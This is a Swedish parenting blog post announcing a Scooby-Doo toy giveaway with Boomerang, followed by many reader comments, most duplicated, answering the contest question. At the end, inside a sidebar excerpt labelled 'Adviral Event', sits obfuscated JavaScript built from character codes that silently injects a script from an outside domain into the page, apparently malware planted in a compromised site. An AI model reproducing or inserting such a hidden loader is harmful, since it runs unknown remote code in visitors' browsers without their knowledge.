Tävling! Scooby Doo.


Pris2_scooby

 

Tävling i samarbete med Boomerang  =) 
Hej fina du! Du som följt mig här inne ett tag vet att Lilleman älskar lego, och jag är sämst på att bygga lego… hehe! MEN jag gör mitt bästa och vi yrkas allts tillslut att få ihop det vi håller på med. Men Lilleman älskar inte bara lego, han älskar även  scooby Doo =) Så i samarbete med Scooby Doo så får jag ha en tävling för er =)

image
Om Scooby-veckan
Det är inte bara monster som vill få tag i Scooby-Doo och hans vänner – det vill barn också! Den 15-23 oktober blir det fullt med Scooby-Doo på barnkanalen Boomerang.

Kanalen visar de bästa serierna och filmerna med Scooby och hans mysterielösande vänner. Scooby-veckan kommer bland annat innebära premiär för filmen Scooby-Doo Frankencreepy och helt nya avsnitt av Va’ Cool Scooby-Doo.
Om Scooby-Doo
Scooby-Doo är en mycket omtyckt tecknad serie som visas på Boomerang. Den har blivit utsedd av press till en av de bästa animerade serierna genom tiderna.
Handlingen kretsar kring fyra tonåringar – och deras talande bruna Grand danois vid namn Scooby-Doo.

Tillsammans löser de mysterier som nästan alltid involverar övernaturliga inslag och en rad upptåg.
Nu kan 3 stycken av mina läsare vinna varsin leksak! Allt du behöver göra är att svara på denna fråga i mina kommentarer:

Vilken färg är det på automaten i klippet ”den hemsökta automaten”?
Behöver ni hjälp med frågan, så kika på denna länk: HÄR  Glöm inte, tävlar man inte så har man ingen chans att vinna. Så stort lycka till nu =)

1:a pris: LEGO – Scooby-Doo Mystery Machine
699kr styck

2:a pris: Scooby-Doo Spökhus-spel
299kr styck

3:e pris: Rubix-kub med Scooby-Doo och andra Boomerang-favoriter
100kr styck

 

Pris1_scooby Pris3_scooby

119 Komentarer

 1. Har en go son med en utvecklingstörning som totalälskar att bygga lego o följa instruktionen o bilderna sida efter sida,nogrant o metodiskt. En av filmfavoriterna är Scubby doo som vi ser på DVD då vi inte har merän basutbudet.1,2 o4.kunskapskanalen o UR.
  Jag bor på Öland o saknar så din affär o Goa personal.Känns tomt o öde o spontanköpen uteblir.Köpte höstlökar på plantagen o fick leta efter personal för att kunna betala. O dina fina snittblommor-vasarna gapar tomma nu.

 2. Har en go son med en utvecklingstörning som totalälskar att bygga lego o följa instruktionen o bilderna sida efter sida,nogrant o metodiskt. En av filmfavoriterna är Scubby doo som vi ser på DVD då vi inte har merän basutbudet.1,2 o4.kunskapskanalen o UR.
  Jag bor på Öland o saknar så din affär o Goa personal.Känns tomt o öde o spontanköpen uteblir.Köpte höstlökar på plantagen o fick leta efter personal för att kunna betala. O dina fina snittblommor-vasarna gapar tomma nu.

 3. Hej!
  Min son älskar Scooby Doo så detta hade varit en perfekt tävling för att försöka vinna något till honom. Men jag undrar vilken frågan är?
  Tack för en härlig blogg!

 4. Hej!

  Min son älskar Scooby Doo så detta hade varit en perfekt tävling för att försöka vinna något till honom. Men jag undrar vilken frågan är?

  Tack för en härlig blogg!

 5. Min son älskar precis som din att bygga med lego. De är jämngamla så kanske har det med åldern att göra? ?
  Skulle hemskt gärna vilja vara med och tävla, men hittar ingen fråga att svara på…
  Sååå jag hoppas att svaret är… hmm… Shaggy? ?

 6. Min son älskar precis som din att bygga med lego. De är jämngamla så kanske har det med åldern att göra? 😊
  Skulle hemskt gärna vilja vara med och tävla, men hittar ingen fråga att svara på…
  Sååå jag hoppas att svaret är… hmm… Shaggy? 😂

 7. Jag har en 5 årig tjej som är helt galen i Scooby doo. Dessutom fyller hon nu i december så vore en perfekt present:) men jag hittar inte heller någon fråga att svara på??

 8. Jag har en 5 årig tjej som är helt galen i Scooby doo. Dessutom fyller hon nu i december så vore en perfekt present:) men jag hittar inte heller någon fråga att svara på??

 9. Automaten är BLÅ. Mina tre killar 5, 10 och 12 år gamla älskar Scooby-Doo. Leker leder och tittar på dessa figurer. LEGO och spel är favoriterna, men även fantasilekar där de fångar något eller/och gömmer sig. Halloween närmar sig så de är mycket snack om clowner, spöken och superhjältar.

 10. Automaten är BLÅ. Mina tre killar 5, 10 och 12 år gamla älskar Scooby-Doo. Leker leder och tittar på dessa figurer. LEGO och spel är favoriterna, men även fantasilekar där de fångar något eller/och gömmer sig. Halloween närmar sig så de är mycket snack om clowner, spöken och superhjältar.

 11. Min son är helt frälst av Scooby Doo, skulle bli jätteglad om han vann. Vi spelar in varenda avsnitt som går på TV?. Svaret på frågan är BLÅ. Håller tummar och tår. Tack för en bra blogg! Kommer gå toppen på ditt slutprov gällande din utbildning!!

 12. Min son är helt frälst av Scooby Doo, skulle bli jätteglad om han vann. Vi spelar in varenda avsnitt som går på TV😀. Svaret på frågan är BLÅ. Håller tummar och tår. Tack för en bra blogg! Kommer gå toppen på ditt slutprov gällande din utbildning!!

 13. Hej hopp!
  Den är blå den där automaten!
  Här hemma trampar man på lego (inte alltid kul), sover ibland med någon legobit, helst skulle nog hela vårt hus vara byggt av Lego o alla önskelistor i huset kretsar kring Lego av alla slag.
  Scooby doo är en av de få barnserier som faktiskt står sig genom generationer:)
  Men ja en vinst till mina barn skulle vara underbart!
  Ha det toppenfint allihopa.
  Kramz

 14. Hej hopp!
  Den är blå den där automaten!
  Här hemma trampar man på lego (inte alltid kul), sover ibland med någon legobit, helst skulle nog hela vårt hus vara byggt av Lego o alla önskelistor i huset kretsar kring Lego av alla slag.
  Scooby doo är en av de få barnserier som faktiskt står sig genom generationer:)
  Men ja en vinst till mina barn skulle vara underbart!
  Ha det toppenfint allihopa.
  Kramz

 15. Den är blå.
  Julen kommer med stormsteg och till mina Scooby Doo fantaster här hemma vore detta fantastiska klappar.
  Min pojke är också en legofantast så kombon Scooby Doo + lego vore kul.
  Ha en bra helg!

 16. Den är blå.

  Julen kommer med stormsteg och till mina Scooby Doo fantaster här hemma vore detta fantastiska klappar.

  Min pojke är också en legofantast så kombon Scooby Doo + lego vore kul.

  Ha en bra helg!

 17. Svaret är blå. Min 5 åring älskar lego och Scooby doo. Han hade varit så glad om jag hade vunnit något av detta. Han älskar att tävla med ?

 18. Svaret är blå. Min 5 åring älskar lego och Scooby doo. Han hade varit så glad om jag hade vunnit något av detta. Han älskar att tävla med 😊

 19. Vilken rolig tävling minsann
  Tänk så kul om vi vann
  Sonen tittade på klippet förut och svarar blå
  Nu håller vi tummarna Hej och hå

 20. Vilken rolig tävling minsann
  Tänk så kul om vi vann
  Sonen tittade på klippet förut och svarar blå
  Nu håller vi tummarna Hej och hå

 21. Mina pojkar bara älskar Scoby doo det jag vet
  Hade varit fantastiskt kul att ge dom denna vinst i paket
  De älskar också lego och det vore en dröm att vinna denna bil
  Då skulle de köra den här hemma mil efter mil
  Rätt svar blå

 22. Mina pojkar bara älskar Scoby doo det jag vet
  Hade varit fantastiskt kul att ge dom denna vinst i paket
  De älskar också lego och det vore en dröm att vinna denna bil
  Då skulle de köra den här hemma mil efter mil

  Rätt svar blå

 23. Hej Mycket!
  Automaten är BLÅ ?, min 4 åriga son älskar åxå att bygga lego?
  Hoppas på tur, för tävlar man inte så har man ingen chans att vinna?

 24. Automaten är blå.
  Min son älskar både lego och Scooby Doo, så det hade ju varit en perfekt vinst. Det är inte lätt att vara ensamstående så detta hade varit den perfekta överraskningen till honom.
  Håller alla tummar jag kan!

 25. Mitt lilla barnbarn Buddha som fyller 4 år mitten av november skulle bli jätteglad över en sådan present då han fullkomligt älskar filmer med spänning…ska helst vara en massa spöken och monster. Att då få något från filmerna att leka med skulle förgylla hans dag ?
  Varm kram till dig My

 26. Hej My! Automaten är blå säger Léon på 4 år ? Léon älskar verkligen att bygga med lego han har väldigt svårt att sitta still. Är ensamstående med sonen och lego kostar verkligen skjortan och halva byxan ? Både han och jag skulle bli sjukt glada om vi vann och speciellt han somtjatar om lego varje gång vi går in i en affär.☺️☺️☺️☺️

 27. Jag har en son här hemma på 4år, som älskar Scooby-doo! Allt ska handla om dom;) och som ensamstående förälder som jag är på heltid, är det inte alltid lätt att ge allting. Så denna tävlingen är ju helt perfekt! Automaten är BLÅ:)? kram på dig och din fantastiska son ❤️

 28. Färg blå har 8 barnbarn nioende är på väg alla kan sitta runt en låda med lego hemma hos oss och bygga ,men Noel som är 7 år älskar nog scooby doo mäst av alla

 29. Hej Mycket!

  Automaten är BLÅ 💙, min 4 åriga son älskar åxå att bygga lego😃

  Hoppas på tur, för tävlar man inte så har man ingen chans att vinna😋

 30. Automaten är blå.

  Min son älskar både lego och Scooby Doo, så det hade ju varit en perfekt vinst. Det är inte lätt att vara ensamstående så detta hade varit den perfekta överraskningen till honom.

  Håller alla tummar jag kan!

 31. Mitt lilla barnbarn Buddha som fyller 4 år mitten av november skulle bli jätteglad över en sådan present då han fullkomligt älskar filmer med spänning…ska helst vara en massa spöken och monster. Att då få något från filmerna att leka med skulle förgylla hans dag 🙂
  Varm kram till dig My

 32. Hej My! Automaten är blå säger Léon på 4 år 🙂 Léon älskar verkligen att bygga med lego han har väldigt svårt att sitta still. Är ensamstående med sonen och lego kostar verkligen skjortan och halva byxan 🙈 Både han och jag skulle bli sjukt glada om vi vann och speciellt han somtjatar om lego varje gång vi går in i en affär.☺️☺️☺️☺️

 33. Jag har en son här hemma på 4år, som älskar Scooby-doo! Allt ska handla om dom;) och som ensamstående förälder som jag är på heltid, är det inte alltid lätt att ge allting. Så denna tävlingen är ju helt perfekt! Automaten är BLÅ:)🍀 kram på dig och din fantastiska son ❤️

 34. Färg blå har 8 barnbarn nioende är på väg alla kan sitta runt en låda med lego hemma hos oss och bygga ,men Noel som är 7 år älskar nog scooby doo mäst av alla

 35. Svar: Automaten är blå!
  Underbar blogg! Jag är snart pappaledig med mitt andra barn och då behöver vi leksaker för aktivering till stora pojken! Både han och jag är storförtjusta i lego, och det är så underbart att bara se lyckan i hans ögon om vi skulle vinna! Finns ingen större kärlek än till sina barn!

 36. Svar: Automaten är blå!

  Underbar blogg! Jag är snart pappaledig med mitt andra barn och då behöver vi leksaker för aktivering till stora pojken! Både han och jag är storförtjusta i lego, och det är så underbart att bara se lyckan i hans ögon om vi skulle vinna! Finns ingen större kärlek än till sina barn!

 37. Den är blå. Min yngste son är besatt av två saker, lego och Scooby doo. Han leker aldrig med något annat än lego och ser han på film är det på Scooby. Tror snart vi har alla filmer som finns här hemma. De på Hemmakväll har vi för längesedan sett igenom

 38. Den är blå. Min yngste son är besatt av två saker, lego och Scooby doo. Han leker aldrig med något annat än lego och ser han på film är det på Scooby. Tror snart vi har alla filmer som finns här hemma. De på Hemmakväll har vi för längesedan sett igenom

 39. Automaten är blå . Önskar vinna Scooby doo till yngsta barnbarnet ! Det vore jättekul om jag som farmor – kunde få överraska med denna vinst ! ( vad det än skulle bli )

 40. Automaten är blå . Önskar vinna Scooby doo till yngsta barnbarnet ! Det vore jättekul om jag som farmor – kunde få överraska med denna vinst ! ( vad det än skulle bli )

 41. Automaten är blå. Hoppas få vinna lego till min systerson, för hans önskelista ser ut så här: 1. Lego 2. Lego 3. Mera lego!

 42. Automaten är blå. Hoppas få vinna lego till min systerson, för hans önskelista ser ut så här: 1. Lego 2. Lego 3. Mera lego!

 43. Hej! Vi kollar just nu på marathon av Scooby doo på Boomerang. Ingen i familjen vill eller kan sova pga alla spännande otäcka äventyr. Scobby doo bilen köpte sonen Valter på Legoland i somras. Så den får gärna något annat lyckligt barn vinna. Men blir det någon annan Scooby doo leksak i potten så tävlar vi gärna genom att nämna att automaten är blå. Ha en läskig haloween!

 44. Hej! Vi kollar just nu på marathon av Scooby doo på Boomerang. Ingen i familjen vill eller kan sova pga alla spännande otäcka äventyr. Scobby doo bilen köpte sonen Valter på Legoland i somras. Så den får gärna något annat lyckligt barn vinna. Men blir det någon annan Scooby doo leksak i potten så tävlar vi gärna genom att nämna att automaten är blå. Ha en läskig haloween!

 45. Automaten är blå!
  På tal om blått så är det en färg. Som passar barn. Oavsett kön. Precis som detta Lego-set.
  Mitt barn skulle älska detta läskiga, härliga Lego trots att många omkring henne tycker och tror att hennes Lego bör vara rosa med köks-tema.

 46. Automaten är blå. Min man och son båda älskar Scooby Doo. Lego är en annan favorit hos hela familjen. Vill gärna vinna för att bådealen och sonen skulle må bra av kreativt Scooby Doo byggande eller spelande i stället för Scooby Doo skärmtid.

 47. Automaten är blå!

  På tal om blått så är det en färg. Som passar barn. Oavsett kön. Precis som detta Lego-set.

  Mitt barn skulle älska detta läskiga, härliga Lego trots att många omkring henne tycker och tror att hennes Lego bör vara rosa med köks-tema.

 48. Automaten är BLÅ !
  Min lilla kille älskar precis som din lilla kille LEGO
  och han kan sitta och bygga i timmar !
  I somras tittade han på just det här legot när vi var i en legobutik i New York.
  Det blev inget köp då eftersom vi inte hade plats för lego i väskorna på vår roadtrip.
  Därför vore det extra kul att få överraska honom med det nu.
  ( han har inte sett det här hemma i sverige… )
  Kram från Fröken M

 49. Automaten är blå. Min man och son båda älskar Scooby Doo. Lego är en annan favorit hos hela familjen. Vill gärna vinna för att bådealen och sonen skulle må bra av kreativt Scooby Doo byggande eller spelande i stället för Scooby Doo skärmtid.

 50. Automaten är BLÅ !

  Min lilla kille älskar precis som din lilla kille LEGO
  och han kan sitta och bygga i timmar !

  I somras tittade han på just det här legot när vi var i en legobutik i New York.
  Det blev inget köp då eftersom vi inte hade plats för lego i väskorna på vår roadtrip.
  Därför vore det extra kul att få överraska honom med det nu.
  ( han har inte sett det här hemma i sverige… )
  Kram från Fröken M

 51. Den är blå – Stackars Scooby och Shaggy!
  Lego är helt underbart, inget vi kan vara utan och combon Lego + Scooby blir hur kul som helst.

 52. Automaten är blå ?
  Livet. Det är fantastiskt, men rullar på likt ett lokomotiv utan handbroms. Välling till minstingen, ”Va’ coooool Scooby Dooooooo”……kaffe, sätta håret i slarvig knut, dagis,- skollämningar, jobba, handla, hämta barn, snyta näsa, laga-mat-äta-mat, städa, tvätta, aktiviteter.
  Atjooo.
  ”Sov du lilla videung” och ”Vargsången” på repeat.
  Skrämma bort monster under sängen.
  ”När trollmor har lagt sina”…och…Schhyyyy, de sover.
  Upp! Knäböj, squat, kör-bara-kör, burpees x20. Heja, heja mig!
  Eller?
  Fasen, te och mackor och Bonde söker Fru istället. God natt.
  Grejen är såhär. Det är snart jul. Jag har redan ont i magen av det faktum att det är snart jul, förhoppningar, önskelistor, mat och släktbesök (och uteblivna släktbesök, ouch!). Min story är dock inte relevant här – men jag har bestämt mig för att barnen ska få världens bästa jul med massor av kärlek, värme, skratt och fina julklappar av tomten! Sonen som fyller sex år efter årsskiftet önskar sig LEGO av tomten. Han älskar Scooby Doo och det här vore verkligen en drömvinst att få ge till världens finaste.

 53. Den är blå!
  Jag skulle såklart vilja vinna till min Lego-älskande son. Som liten älskade jag Scooby Doo så det skulle bli så roligt att få bygga det med honom och dessutom skulle jag bli glad om jag fick ge det till honom då jag arbetar mycket skift och inte är ledig så mycket med honom. Det skulle kännas otroligt kul om han fick bygga och han innan vi säger godnatt via telefon fick berätta hur långt han kommit! Lego är ju den perfekta pedagogiska leksaken och skapar gemenskap även fast man inte träffas varje dag. <3

 54. Den är blå – Stackars Scooby och Shaggy!
  Lego är helt underbart, inget vi kan vara utan och combon Lego + Scooby blir hur kul som helst.

 55. Automaten är blå 🙂

  Livet. Det är fantastiskt, men rullar på likt ett lokomotiv utan handbroms. Välling till minstingen, ”Va’ coooool Scooby Dooooooo”……kaffe, sätta håret i slarvig knut, dagis,- skollämningar, jobba, handla, hämta barn, snyta näsa, laga-mat-äta-mat, städa, tvätta, aktiviteter.
  Atjooo.
  ”Sov du lilla videung” och ”Vargsången” på repeat.
  Skrämma bort monster under sängen.
  ”När trollmor har lagt sina”…och…Schhyyyy, de sover.
  Upp! Knäböj, squat, kör-bara-kör, burpees x20. Heja, heja mig!
  Eller?
  Fasen, te och mackor och Bonde söker Fru istället. God natt.

  Grejen är såhär. Det är snart jul. Jag har redan ont i magen av det faktum att det är snart jul, förhoppningar, önskelistor, mat och släktbesök (och uteblivna släktbesök, ouch!). Min story är dock inte relevant här – men jag har bestämt mig för att barnen ska få världens bästa jul med massor av kärlek, värme, skratt och fina julklappar av tomten! Sonen som fyller sex år efter årsskiftet önskar sig LEGO av tomten. Han älskar Scooby Doo och det här vore verkligen en drömvinst att få ge till världens finaste.

 56. Den är blå!

  Jag skulle såklart vilja vinna till min Lego-älskande son. Som liten älskade jag Scooby Doo så det skulle bli så roligt att få bygga det med honom och dessutom skulle jag bli glad om jag fick ge det till honom då jag arbetar mycket skift och inte är ledig så mycket med honom. Det skulle kännas otroligt kul om han fick bygga och han innan vi säger godnatt via telefon fick berätta hur långt han kommit! Lego är ju den perfekta pedagogiska leksaken och skapar gemenskap även fast man inte träffas varje dag. <3

 57. Hej! Hoppas det inte är för sent! Automaten är blå! Min dotter älskar Scooby! Kollar varje dag på Boomerang! ?
  //Nina o Zara

 58. Hej! Hoppas det inte är för sent! Automaten är blå! Min dotter älskar Scooby! Kollar varje dag på Boomerang! 😊
  //Nina o Zara

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/